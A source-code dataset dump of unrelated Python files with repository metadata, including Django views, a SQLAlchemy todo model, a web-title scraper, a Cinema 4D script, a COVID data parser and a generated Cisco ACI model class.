    rootTag, rootClass = get_root_tag(rootNode)
    if rootClass is None:
        # Unknown root element: default to Signature.
        rootTag = 'Signature'
        rootClass = SignatureType
    rootObj = rootClass.factory()
    rootObj.build(rootNode)
    # Enable Python to collect the space used by the DOM.
    doc = None
    if not silence:
        sys.stdout.write('<?xml version="1.0" ?>\n')
        rootObj.export(
            sys.stdout, 0, name_=rootTag,
            namespacedef_='xmlns:ds="http://www.w3.org/2000/09/xmldsig#"',
            pretty_print=True)
    return rootObj
def parseEtree(inFileName, silence=False):
    """Parse an XML file; also build an etree plus node<->object mappings.

    Returns (rootObj, rootElement, mapping, reverse_mapping).
    """
    doc = parsexml_(inFileName)
    rootNode = doc.getroot()
    rootTag, rootClass = get_root_tag(rootNode)
    if rootClass is None:
        # Unknown root element: default to Signature.
        rootTag = 'Signature'
        rootClass = SignatureType
    rootObj = rootClass.factory()
    rootObj.build(rootNode)
    # Enable Python to collect the space used by the DOM.
    doc = None
    mapping = {}
    rootElement = rootObj.to_etree(None, name_=rootTag, mapping_=mapping)
    reverse_mapping = rootObj.gds_reverse_node_mapping(mapping)
    if not silence:
        content = etree_.tostring(
            rootElement, pretty_print=True,
            xml_declaration=True, encoding="utf-8")
        sys.stdout.write(content)
        sys.stdout.write('\n')
    return rootObj, rootElement, mapping, reverse_mapping
def parseString(inString, silence=False):
    """Parse XML from a string into its generated object tree.

    NOTE(review): imports the Python 2-only StringIO module; under
    Python 3 this would need io.StringIO -- confirm the targeted
    interpreter for this generated module.
    """
    from StringIO import StringIO
    doc = parsexml_(StringIO(inString))
    rootNode = doc.getroot()
    roots = get_root_tag(rootNode)
    rootClass = roots[1]
    if rootClass is None:
        rootClass = SignatureType
    rootObj = rootClass.factory()
    rootObj.build(rootNode)
    # Enable Python to collect the space used by the DOM.
    doc = None
    if not silence:
        sys.stdout.write('<?xml version="1.0" ?>\n')
        rootObj.export(
            sys.stdout, 0, name_="Signature",
            namespacedef_='xmlns:ds="http://www.w3.org/2000/09/xmldsig#"')
    return rootObj
def parseLiteral(inFileName, silence=False):
    """Parse an XML file and emit it as Python literal (constructor) source."""
    doc = parsexml_(inFileName)
    rootNode = doc.getroot()
    rootTag, rootClass = get_root_tag(rootNode)
    if rootClass is None:
        # Unknown root element: default to Signature.
        rootTag = 'Signature'
        rootClass = SignatureType
    rootObj = rootClass.factory()
    rootObj.build(rootNode)
    # Enable Python to collect the space used by the DOM.
    doc = None
    if not silence:
        sys.stdout.write('#from xmldsig-core-schema_v01 import *\n\n')
        sys.stdout.write('import xmldsig-core-schema_v01 as model_\n\n')
        sys.stdout.write('rootObj = model_.rootTag(\n')
        rootObj.exportLiteral(sys.stdout, 0, name_=rootTag)
        sys.stdout.write(')\n')
    return rootObj
def main():
    """Command-line entry point: expects exactly one XML file argument."""
    args = sys.argv[1:]
    if len(args) != 1:
        usage()
    else:
        parse(args[0])
# Script entry point (the pdb line is kept as a debugging convenience).
if __name__ == '__main__':
    #import pdb; pdb.set_trace()
    main()
# Public API of this generated module (``from <module> import *``).
__all__ = [
    "CanonicalizationMethodType",
    "DSAKeyValueType",
    "DigestMethodType",
    "KeyInfoType",
    "KeyValueType",
    "ManifestType",
    "ObjectType",
    "PGPDataType",
    "RSAKeyValueType",
    "ReferenceType",
    "RetrievalMethodType",
    "SPKIDataType",
    "SignatureMethodType",
    "SignaturePropertiesType",
    "SignaturePropertyType",
    "SignatureType",
    "SignatureValueType",
    "SignedInfoType",
    "TransformType",
    "TransformsType",
    "X509DataType",
    "X509IssuerSerialType"
]
| [
"[email protected]"
] | |
06d81819ec245e77cec949f12a8b70ffb0617810 | 9431bba2d148f8aef9c0a8f3ca16fcf875890757 | /scraping/get_html_title.py | 9f5573db2266ed5c6d715cae3af9936cb85faae6 | [
"MIT"
] | permissive | terasakisatoshi/pythonCodes | fba0b78414b2c85f4a738200354ea583f0516768 | 953210c06e9885a7c885bc01047715a77de08a1a | refs/heads/master | 2023-05-14T12:30:22.201711 | 2023-05-07T13:41:22 | 2023-05-07T13:41:22 | 197,893,702 | 2 | 1 | MIT | 2022-11-25T10:59:52 | 2019-07-20T07:09:12 | Jupyter Notebook | UTF-8 | Python | false | false | 603 | py | from urllib.request import urlopen
from urllib.error import HTTPError
from bs4 import BeautifulSoup
def get_title(url):
try:
html = urlopen(url)
except HTTPError as e:
print(e)
return None
try:
bsoup = BeautifulSoup(html.read())
title = bsoup.body.h1
except AttributeError as e:
return None
return title
def main():
    """Fetch a known demo page and print its title (or a failure message)."""
    url = "http://www.pythonscraping.com/pages/page1.html"
    title = get_title(url)
    if title is None:
        print("Title could not be found")
    else:
        print(title)
# Allow use both as a script and as an importable module.
if __name__ == '__main__':
    main()
| [
"[email protected]"
] | |
c822f6ed07953bee56d648fff611aea04680c407 | 366b2ff9cd498808438bf7c48f697c05b361d02c | /models.py | 0606075241f9749a7ff176655dadf12a115be600 | [] | no_license | c-bata/AngularJS-Bottle-TodoApp | 1aef6b09fd85fabaa63898ab3fb9a2d586216b93 | 8f03820b7949b0c28477970c58f25ccd1856b2a9 | refs/heads/master | 2021-03-12T22:40:32.000758 | 2015-11-04T11:14:47 | 2015-11-04T11:14:47 | 38,732,944 | 2 | 0 | null | 2015-11-04T11:11:39 | 2015-07-08T05:02:47 | Python | UTF-8 | Python | false | false | 1,225 | py | from datetime import datetime
from sqlalchemy import (
Column, Integer, Unicode, UnicodeText, Boolean, DateTime,
create_engine
)
from sqlalchemy.ext import declarative
from bottle.ext import sqlalchemy
Base = declarative.declarative_base()
engine = create_engine('sqlite:///:memory:', echo=True)
plugin = sqlalchemy.Plugin(
engine,
Base.metadata,
keyword='db', # 関数内で挿入される変数名
create=True, # テーブルを作成するか
commit=True, # 関数終了時にトランザクションをコミットするか
use_kwargs=False
)
class Task(Base):
    """A single todo item persisted in the ``tasks`` table."""
    __tablename__ = 'tasks'

    id = Column(Integer, primary_key=True)
    title = Column(Unicode(255), nullable=False)
    memo = Column(UnicodeText)
    done = Column(Boolean, nullable=False, default=False)
    # Bug fix: pass the callable, not datetime.now(). Calling it here would
    # freeze the import-time timestamp as the default for every row;
    # SQLAlchemy invokes a callable default once per INSERT instead.
    created_at = Column(DateTime, default=datetime.now, nullable=False)

    def __repr__(self):
        return "<Task (title='%s')>" % self.title

    @property
    def serialize(self):
        """JSON-serializable dict representation of this task."""
        return {
            'id': self.id,
            'title': self.title,
            'memo': self.memo,
            'done': self.done,
            'created_at': self.created_at.strftime('%Y-%m-%d')
        }
| [
"[email protected]"
] | |
7466229e21a1f6ba95a9a8ae72f30c4c238f16fe | 9ecf6cfdc15b704b44688c533c5c6e9eccc5c0ab | /randomise-selected-objects-color.py | 181f6e92a57894fc3a910c380826c7c07f9afaf0 | [] | no_license | Bordilovskii/cinema4d-scripts | 96b1eab6aa442ef6ead105d22e0bab352d8563c9 | 811be702a64c8b0c97dedbbf95723ce0af06a7fa | refs/heads/master | 2020-03-27T06:37:25.692966 | 2018-07-04T09:30:18 | 2018-07-04T09:30:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 508 | py | import c4d
import random as rand
def main():
    """Give every selected Cinema 4D object a random display color (undoable)."""
    doc.StartUndo()
    objs = doc.GetActiveObjects(0)
    if len(objs) == 0:return
    for obj in objs:
        doc.AddUndo(c4d.UNDOTYPE_CHANGE,obj)
        # 2 enables the object's custom display color.
        obj[c4d.ID_BASEOBJECT_USECOLOR] = 2
        r = rand.random()
        g = rand.random()
        b = rand.random()
        # NOTE(review): AddUndo is recorded twice for the same object in one
        # iteration -- presumably one call would suffice; confirm intended
        # undo granularity before changing.
        doc.AddUndo(c4d.UNDOTYPE_CHANGE,obj)
        obj[c4d.ID_BASEOBJECT_COLOR] = c4d.Vector(r,g,b)
    c4d.EventAdd()
    doc.EndUndo()
# Cinema 4D executes this when run from the Script Manager.
if __name__=='__main__':
    main()
"[email protected]"
] | |
24cdb1982f2fe439f8411d943177ebf9d46ba73e | 8d6ec0275afe856834bf10643e3b4b2cbcb318f4 | /03-online-shop/myshop/shop/views.py | 93982ce741c0abec344a2ff2ddd5db46f5ee1ff2 | [] | no_license | markronquillo/django-by-example | be35fbbc483440a11c440733931c146d56816c97 | fa749e5077f64ac68f11c7b529e13ac097cb5bd0 | refs/heads/master | 2021-01-11T14:38:40.854636 | 2017-02-24T03:09:58 | 2017-02-24T03:09:58 | 80,184,667 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 883 | py | from django.shortcuts import render, get_object_or_404
from .models import Category, Product
from cart.forms import CartAddProductForm
def product_list(request, category_slug=None):
    """Render the product catalogue, optionally filtered by category slug."""
    categories = Category.objects.all()
    products = Product.objects.filter(available=True)
    category = None
    if category_slug:
        # 404 when the slug does not match any category.
        category = get_object_or_404(Category, slug=category_slug)
        products = products.filter(category=category)
    context = {
        'category': category,
        'categories': categories,
        'products': products,
    }
    return render(request, 'shop/product/list.html', context)
def product_detail(request, id, slug):
    """Render one available product, matched by both id and slug (404 otherwise)."""
    product = get_object_or_404(
        Product, id=id, slug=slug, available=True)
    # Form used by the template to add this product to the cart.
    cart_product_form = CartAddProductForm()
    context = {
        'product': product,
        'cart_product_form': cart_product_form,
    }
    return render(request, 'shop/product/detail.html', context)
| [
"[email protected]"
] | |
1fcb488242e10d0c03422d74916f668b21eb791b | 0e69513ca0fda765b5f655c4405aafb209491389 | /input/parse_pcm-dpc_it.py | 4492610a839245b4948d341f93c7abb1d5d1c339 | [] | no_license | adrianrequena/covid19 | 57a54fdaec79c0d1d57de63810e3337513e87b2f | a13cb2c117a68de2740702831f84c17049aa95ab | refs/heads/master | 2023-07-20T01:49:44.583897 | 2020-04-01T19:19:21 | 2020-04-01T19:19:21 | 252,279,864 | 0 | 0 | null | 2023-07-06T21:57:02 | 2020-04-01T20:28:35 | Python | UTF-8 | Python | false | false | 1,687 | py | #!/usr/bin/env python
import os
import sys
from pathlib import Path
from datetime import datetime, timedelta
import pandas
from utils import \
parse_level_args, github_raw_dataframe, github_raw_url, dataframe_output, merge_previous
# Root path of the project
ROOT = Path(os.path.dirname(__file__)) / '..'
# This script can parse both region-level and country-level data
is_region = parse_level_args(sys.argv[1:]).level == 'region'
if is_region:
    df = github_raw_dataframe(
        'pcm-dpc/COVID-19', 'dati-json/dpc-covid19-ita-regioni.json', orient='records')
else:
    df = github_raw_dataframe(
        'pcm-dpc/COVID-19', 'dati-json/dpc-covid19-ita-andamento-nazionale.json', orient='records')
# Translate the Italian column names to the canonical schema.
df = df.rename(columns={
    'data': 'Date',
    'totale_casi': 'Confirmed',
    'deceduti': 'Deaths',
    'tamponi': 'Tested'
})
if is_region:
    df['_RegionLabel'] = df['denominazione_regione']
# Parse date into a datetime object
df['Date'] = df['Date'].apply(lambda date: datetime.fromisoformat(date).date())
# Offset date by 1 day to match ECDC report
# NOTE(review): RegionCode is also initialized here for the country-level
# branch so the merge filter below can test pandas.isna(row['RegionCode']).
if not is_region:
    df['RegionCode'] = None
    df['Date'] = df['Date'].apply(lambda date: date + timedelta(days=1))
# Convert dates to ISO format
df['Date'] = df['Date'].apply(lambda date: date.isoformat())
# Add the country code to all records
df['CountryCode'] = 'IT'
# Merge the new data with the existing data (prefer new data if duplicates)
if not is_region:
    filter_function = lambda row: row['CountryCode'] == 'IT' and pandas.isna(row['RegionCode'])
    df = merge_previous(df, ['Date', 'CountryCode'], filter_function)
# Output the results
dataframe_output(df, ROOT, 'IT' if is_region else None)
"[email protected]"
] | |
43a3171c18f24f3e5cf493bcf8576ddb6b9456b6 | ebd2df05eae5875f3edd5c891442b9fe1f3d54ee | /empleados/views.py | 3b8388bd33952007db18e34edaecbd69330d2a7c | [] | no_license | gfcarbonell/app_navidad | 06191ef3b084d40c7a5f387a60407406c2c89d54 | fa290f8cf0b4b0d9237b555417fe38f879938adf | refs/heads/master | 2020-12-24T11:54:10.514150 | 2016-11-16T15:37:09 | 2016-11-16T15:37:09 | 73,115,163 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,364 | py | # -*- encoding: utf-8 -*-
from django.conf import settings
from django.views.generic import CreateView, UpdateView, ListView, DetailView
from .models import Empleado
from .forms import EmpleadoModelForm, EmpleadoUsuarioForm
from django.core.urlresolvers import reverse_lazy
from rest_framework import viewsets
from django.db.models import Q
import socket
from pure_pagination.mixins import PaginationMixin
from django.template.defaultfilters import slugify
from infos_sistemas.mixins import TipoPerfilUsuarioMixin
class EmpleadoCreateView(TipoPerfilUsuarioMixin, CreateView):
    """Create an employee together with its backing user account."""
    template_name = 'empleado_create.html'
    form_class = EmpleadoUsuarioForm
    model = Empleado
    success_url = reverse_lazy('empleado:control')

    @staticmethod
    def _stamp_audit_fields(obj, creador):
        """Fill the creator/editor and host/IP audit columns on *obj*.

        Deduplicates the identical stamping previously done inline for the
        user and the employee.
        """
        obj.usuario_creador = creador
        obj.ultimo_usuario_editor = creador
        try:
            obj.nombre_host = socket.gethostname()
        except Exception:  # narrowed from a bare except; keep the fallback
            obj.nombre_host = 'localhost'
        obj.ultimo_nombre_host = obj.nombre_host
        obj.direccion_ip = socket.gethostbyname(socket.gethostname())
        obj.ultimo_direccion_ip = obj.direccion_ip

    def form_valid(self, form):
        user = form['model_form_usuario'].save(commit=False)
        self._stamp_audit_fields(user, self.request.user)
        empleado = form['model_form_empleado'].save(commit=False)
        empleado.tipo_persona = 'Natural'
        if empleado.numero_hijo is None:
            empleado.numero_hijo = 0
        user.save()
        empleado.usuario = user
        self._stamp_audit_fields(empleado, self.request.user)
        empleado.save()
        return super(EmpleadoCreateView, self).form_valid(form)
class EmpleadoUpdate(TipoPerfilUsuarioMixin, UpdateView):
    """Edit an existing employee record (not its user account)."""
    form_class = EmpleadoModelForm
    success_url = reverse_lazy('empleado:control')
    template_name = 'empleado_update.html'
    queryset = Empleado.objects.all()

    def form_valid(self, form):
        self.object = form.save(commit=False)
        if self.object.numero_hijo is None:
            self.object.numero_hijo = 0
        # Refresh the audit columns with the editing user and host.
        self.object.ultimo_usuario_editor = self.request.user
        try:
            self.object.ultimo_nombre_host = socket.gethostname()
        except Exception:  # narrowed from a bare except; keep the fallback
            self.object.ultimo_nombre_host = 'localhost'
        self.object.ultimo_direccion_ip = socket.gethostbyname(socket.gethostname())
        self.object.save()
        return super(EmpleadoUpdate, self).form_valid(form)
class EmpleadoUsuarioUpdateView(TipoPerfilUsuarioMixin, UpdateView):
    """Edit an employee together with its backing user account."""
    form_class = EmpleadoUsuarioForm
    success_url = reverse_lazy('empleado:control')
    template_name = 'empleado_usuario_update.html'
    queryset = Empleado.objects.all()

    def get_context_data(self, **kwarg):
        # Bug fix: super() previously named 'EmpleadoUpdateView', which is
        # not defined in this module and raised NameError at request time.
        context = super(EmpleadoUsuarioUpdateView, self).get_context_data(**kwarg)
        empleado = self.queryset.get(slug__contains=self.kwargs['slug'])
        context.update({'empleado': empleado})
        return context

    def get_form_kwargs(self):
        kwargs = super(EmpleadoUsuarioUpdateView, self).get_form_kwargs()
        # The multi-form expects one instance per sub-form.
        kwargs.update(instance={
            'model_form_empleado': self.object,
            'model_form_usuario': self.object.usuario,
        })
        return kwargs

    def form_valid(self, form):
        empleado = self.queryset.get(slug__contains=self.kwargs['slug'])
        user = form['model_form_usuario'].save(commit=False)
        user = empleado.usuario
        user.ultimo_usuario_editor = self.request.user
        # NOTE(review): both branches assign the same value (as in the
        # original); the bare except is narrowed to Exception only.
        try:
            user.ultimo_nombre_host = user.nombre_host
        except Exception:
            user.ultimo_nombre_host = user.nombre_host
        user.ultimo_direccion_ip = socket.gethostbyname(socket.gethostname())
        empleado = form['model_form_empleado'].save(commit=False)
        empleado.tipo_persona = 'Natural'
        if empleado.numero_hijo is None:
            empleado.numero_hijo = 0
        user.save()
        empleado.usuario = user
        empleado.ultimo_usuario_editor = self.request.user
        try:
            empleado.ultimo_nombre_host = empleado.nombre_host
        except Exception:
            empleado.ultimo_nombre_host = empleado.nombre_host
        empleado.ultimo_direccion_ip = socket.gethostbyname(socket.gethostname())
        empleado.save()
        return super(EmpleadoUsuarioUpdateView, self).form_valid(form)
class EmpleadoDetailView(TipoPerfilUsuarioMixin, DetailView):
    """Read-only detail page for a single employee."""
    model = Empleado
    queryset = Empleado.objects.all()
    template_name = 'empleado_detail.html'
class EmpleadoControlListView(PaginationMixin, TipoPerfilUsuarioMixin, ListView):
    """Paginated employee list with a simple slug-based search."""
    model = Empleado
    template_name = 'empleados.html'
    paginate_by = 10

    def get_context_data(self, **kwarg):
        context = super(EmpleadoControlListView, self).get_context_data(**kwarg)
        boton_menu = False
        total_registro = self.model.objects.count()
        data = {
            'boton_menu' : boton_menu,
            'total_registro': total_registro,
        }
        context.update(data)
        return context

    def get(self, request, *args, **kwargs):
        # When a search term is present, render the filtered queryset
        # directly instead of going through ListView.get.
        if request.GET.get('search_registro', None):
            self.object_list = self.get_queryset()
            context = self.get_context_data()
            return self.render_to_response(context)
        else:
            # Bug fix: the original called super(...).get(self, request, ...),
            # passing self as the bound method's 'request' argument.
            return super(EmpleadoControlListView, self).get(request, *args, **kwargs)

    def get_queryset(self):
        # Match against the slugified term so case/accents in the query
        # do not matter.
        if self.request.GET.get('search_registro', None):
            value = self.request.GET.get('search_registro', None)
            queryset = self.model.objects.filter(Q(slug__icontains=slugify(value)))
        else:
            queryset = super(EmpleadoControlListView, self).get_queryset()
        return queryset
| [
"[email protected]"
] | |
26dace9da5168c53db1423f65ab53c70e82b7187 | d131ad1baf891a2918ae27b0dc57f3c0c1f99586 | /blog/migrations/0001_initial.py | ec6923c8ffb8cbccaa6e420a5a387c7af1f5ae91 | [] | no_license | Alymbekov/TestProjectForDjangoForms | d3bf24844628136f9236d5222d32235e87f7aecd | ce3262e7565e293b691ea70b94b67155c15525bd | refs/heads/master | 2020-04-10T05:35:19.516127 | 2018-12-07T14:24:05 | 2018-12-07T14:24:05 | 160,832,149 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 713 | py | # Generated by Django 2.1 on 2018-11-18 08:19
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(db_index=True, max_length=150)),
('slug', models.SlugField(max_length=150, unique=True)),
('body', models.TextField(blank=True, db_index=True)),
('date_pub', models.DateTimeField(auto_now_add=True)),
],
),
]
| [
"[email protected]"
] | |
471b28b164af5875eb9670ed6bdea81faaa98ba6 | 9d1c9a81520437122d9f2f012c2737e4dd22713c | /src/td_clean.py | 0b0e3a8e8ad9f059d56a6f5f5dd04748362a15f8 | [
"MIT"
] | permissive | geophysics-ubonn/crtomo_tools | 136aa39a8a0d92061a739ee3723b6ef7879c57b8 | aa73a67479c4e96bc7734f88ac7b35a74b5d158c | refs/heads/master | 2023-08-24T01:55:29.517285 | 2023-08-08T13:03:46 | 2023-08-08T13:03:46 | 142,049,690 | 2 | 9 | MIT | 2019-06-06T12:46:42 | 2018-07-23T17:54:24 | Standard ML | UTF-8 | Python | false | false | 1,791 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Clean a simulation directory of all modeling/inversion files
"""
import numpy as np
import os
import glob
def main():
rm_list = []
required_files_inversion = (
'exe/crtomo.cfg',
'grid/elem.dat',
'grid/elec.dat',
'mod/volt.dat')
clean_inv = np.all([os.path.isfile(x) for x in required_files_inversion])
if clean_inv:
rm_list += glob.glob('inv/*')
rm_list += [
'exe/error.dat',
'exe/crtomo.pid',
'exe/variogram.gnu',
'exe/inv.elecpositions',
'exe/inv.gstat',
'exe/inv.lastmod',
'exe/inv.lastmod_rho',
'exe/inv.mynoise_pha',
'exe/inv.mynoise_rho',
'exe/inv.mynoise_voltages',
'exe/tmp.kfak',
'overview.png',
]
required_files_modelling = (
'exe/crmod.cfg',
'grid/elem.dat',
'grid/elec.dat',
'config/config.dat',
'rho/rho.dat'
)
clean_mod = np.all([os.path.isfile(x) for x in required_files_modelling])
if clean_mod:
rm_list += glob.glob('mod/sens/*')
rm_list += glob.glob('mod/pot/*')
rm_list += ['mod/volt.dat', ]
rm_list += ['exe/crmod.pid', ]
for filename in rm_list:
if os.path.isfile(filename):
# print('Removing file {0}'.format(filename))
os.remove(filename)
plot_files = (
'rho.png',
'imag.png',
'real.png',
'phi.png',
'cov.png',
'fpi_imag.png',
'fpi_phi.png',
'fpi_real.png',
)
for filename in plot_files:
if os.path.isfile(filename):
os.remove(filename)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
60d9422069f85a93dcee9aecd46120c3a7253c69 | f4b60f5e49baf60976987946c20a8ebca4880602 | /lib/python2.7/site-packages/acimodel-1.3_2j-py2.7.egg/cobra/modelimpl/tag/insttask.py | e2820118edd9b39d43659c40ce0995dfd34ecc0b | [] | no_license | cqbomb/qytang_aci | 12e508d54d9f774b537c33563762e694783d6ba8 | a7fab9d6cda7fadcc995672e55c0ef7e7187696e | refs/heads/master | 2022-12-21T13:30:05.240231 | 2018-12-04T01:46:53 | 2018-12-04T01:46:53 | 159,911,666 | 0 | 0 | null | 2022-12-07T23:53:02 | 2018-12-01T05:17:50 | Python | UTF-8 | Python | false | false | 16,985 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2016 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class InstTask(Mo):
"""
An instance task.
"""
meta = ClassMeta("cobra.model.tag.InstTask")
meta.moClassName = "tagInstTask"
meta.rnFormat = "tagInstTask-%(id)s"
meta.category = MoCategory.TASK
meta.label = "None"
meta.writeAccessMask = 0x1
meta.readAccessMask = 0x1
meta.isDomainable = False
meta.isReadOnly = True
meta.isConfigurable = False
meta.isDeletable = False
meta.isContextRoot = False
meta.parentClasses.add("cobra.model.action.TopomgrSubj")
meta.parentClasses.add("cobra.model.action.ObserverSubj")
meta.parentClasses.add("cobra.model.action.VmmmgrSubj")
meta.parentClasses.add("cobra.model.action.SnmpdSubj")
meta.parentClasses.add("cobra.model.action.ScripthandlerSubj")
meta.parentClasses.add("cobra.model.action.ConfelemSubj")
meta.parentClasses.add("cobra.model.action.EventmgrSubj")
meta.parentClasses.add("cobra.model.action.OspaelemSubj")
meta.parentClasses.add("cobra.model.action.VtapSubj")
meta.parentClasses.add("cobra.model.action.OshSubj")
meta.parentClasses.add("cobra.model.action.DhcpdSubj")
meta.parentClasses.add("cobra.model.action.ObserverelemSubj")
meta.parentClasses.add("cobra.model.action.DbgrelemSubj")
meta.parentClasses.add("cobra.model.action.VleafelemSubj")
meta.parentClasses.add("cobra.model.action.NxosmockSubj")
meta.parentClasses.add("cobra.model.action.DbgrSubj")
meta.parentClasses.add("cobra.model.action.AppliancedirectorSubj")
meta.parentClasses.add("cobra.model.action.OpflexpSubj")
meta.parentClasses.add("cobra.model.action.BootmgrSubj")
meta.parentClasses.add("cobra.model.action.AeSubj")
meta.parentClasses.add("cobra.model.action.PolicymgrSubj")
meta.parentClasses.add("cobra.model.action.ExtXMLApiSubj")
meta.parentClasses.add("cobra.model.action.OpflexelemSubj")
meta.parentClasses.add("cobra.model.action.PolicyelemSubj")
meta.parentClasses.add("cobra.model.action.IdmgrSubj")
meta.superClasses.add("cobra.model.action.RInst")
meta.superClasses.add("cobra.model.pol.ComplElem")
meta.superClasses.add("cobra.model.task.Inst")
meta.superClasses.add("cobra.model.action.Inst")
meta.rnPrefixes = [
('tagInstTask-', True),
]
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "data", "data", 52, PropCategory.REGULAR)
prop.label = "Data"
prop.isImplicit = True
prop.isAdmin = True
prop.range = [(0, 512)]
meta.props.add("data", prop)
prop = PropMeta("str", "descr", "descr", 33, PropCategory.REGULAR)
prop.label = "Description"
prop.isImplicit = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("descr", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "endTs", "endTs", 15575, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("endTs", prop)
prop = PropMeta("str", "fail", "fail", 46, PropCategory.REGULAR)
prop.label = "Fail"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("fail", prop)
prop = PropMeta("str", "id", "id", 5642, PropCategory.REGULAR)
prop.label = "ID"
prop.isConfig = True
prop.isAdmin = True
prop.isCreateOnly = True
prop.isNaming = True
prop.defaultValue = 0
prop.defaultValueStr = "none"
prop._addConstant("ConfDef", "confdef", 4)
prop._addConstant("none", "none", 0)
meta.props.add("id", prop)
prop = PropMeta("str", "invErrCode", "invErrCode", 49, PropCategory.REGULAR)
prop.label = "Remote Error Code"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("ERR-FILTER-illegal-format", None, 1140)
prop._addConstant("ERR-FSM-no-such-state", None, 1160)
prop._addConstant("ERR-HTTP-set-error", None, 1551)
prop._addConstant("ERR-HTTPS-set-error", None, 1552)
prop._addConstant("ERR-MO-CONFIG-child-object-cant-be-configured", None, 1130)
prop._addConstant("ERR-MO-META-no-such-object-class", None, 1122)
prop._addConstant("ERR-MO-PROPERTY-no-such-property", None, 1121)
prop._addConstant("ERR-MO-PROPERTY-value-out-of-range", None, 1120)
prop._addConstant("ERR-MO-access-denied", None, 1170)
prop._addConstant("ERR-MO-deletion-rule-violation", None, 1107)
prop._addConstant("ERR-MO-duplicate-object", None, 1103)
prop._addConstant("ERR-MO-illegal-containment", None, 1106)
prop._addConstant("ERR-MO-illegal-creation", None, 1105)
prop._addConstant("ERR-MO-illegal-iterator-state", None, 1100)
prop._addConstant("ERR-MO-illegal-object-lifecycle-transition", None, 1101)
prop._addConstant("ERR-MO-naming-rule-violation", None, 1104)
prop._addConstant("ERR-MO-object-not-found", None, 1102)
prop._addConstant("ERR-MO-resource-allocation", None, 1150)
prop._addConstant("ERR-aaa-config-modify-error", None, 1520)
prop._addConstant("ERR-acct-realm-set-error", None, 1513)
prop._addConstant("ERR-add-ctrlr", None, 1574)
prop._addConstant("ERR-admin-passwd-set", None, 1522)
prop._addConstant("ERR-api", None, 1571)
prop._addConstant("ERR-auth-issue", None, 1548)
prop._addConstant("ERR-auth-realm-set-error", None, 1514)
prop._addConstant("ERR-authentication", None, 1534)
prop._addConstant("ERR-authorization-required", None, 1535)
prop._addConstant("ERR-connect", None, 1572)
prop._addConstant("ERR-create-domain", None, 1562)
prop._addConstant("ERR-create-keyring", None, 1560)
prop._addConstant("ERR-create-role", None, 1526)
prop._addConstant("ERR-create-user", None, 1524)
prop._addConstant("ERR-delete-domain", None, 1564)
prop._addConstant("ERR-delete-role", None, 1528)
prop._addConstant("ERR-delete-user", None, 1523)
prop._addConstant("ERR-domain-set-error", None, 1561)
prop._addConstant("ERR-http-initializing", None, 1549)
prop._addConstant("ERR-incompat-ctrlr-version", None, 1568)
prop._addConstant("ERR-internal-error", None, 1540)
prop._addConstant("ERR-invalid-args", None, 1569)
prop._addConstant("ERR-invalid-domain-name", None, 1582)
prop._addConstant("ERR-ldap-delete-error", None, 1510)
prop._addConstant("ERR-ldap-get-error", None, 1509)
prop._addConstant("ERR-ldap-group-modify-error", None, 1518)
prop._addConstant("ERR-ldap-group-set-error", None, 1502)
prop._addConstant("ERR-ldap-set-error", None, 1511)
prop._addConstant("ERR-missing-method", None, 1546)
prop._addConstant("ERR-modify-ctrlr-access", None, 1567)
prop._addConstant("ERR-modify-ctrlr-dvs-version", None, 1576)
prop._addConstant("ERR-modify-ctrlr-rootcont", None, 1575)
prop._addConstant("ERR-modify-ctrlr-scope", None, 1573)
prop._addConstant("ERR-modify-ctrlr-trig-inventory", None, 1577)
prop._addConstant("ERR-modify-domain", None, 1563)
prop._addConstant("ERR-modify-domain-encapmode", None, 1581)
prop._addConstant("ERR-modify-domain-enfpref", None, 1578)
prop._addConstant("ERR-modify-domain-mcastpool", None, 1579)
prop._addConstant("ERR-modify-domain-mode", None, 1580)
prop._addConstant("ERR-modify-role", None, 1527)
prop._addConstant("ERR-modify-user", None, 1525)
prop._addConstant("ERR-modify-user-domain", None, 1565)
prop._addConstant("ERR-modify-user-role", None, 1532)
prop._addConstant("ERR-no-buf", None, 1570)
prop._addConstant("ERR-passwd-set-failure", None, 1566)
prop._addConstant("ERR-provider-group-modify-error", None, 1519)
prop._addConstant("ERR-provider-group-set-error", None, 1512)
prop._addConstant("ERR-radius-global-set-error", None, 1505)
prop._addConstant("ERR-radius-group-set-error", None, 1501)
prop._addConstant("ERR-radius-set-error", None, 1504)
prop._addConstant("ERR-request-timeout", None, 1545)
prop._addConstant("ERR-role-set-error", None, 1515)
prop._addConstant("ERR-secondary-node", None, 1550)
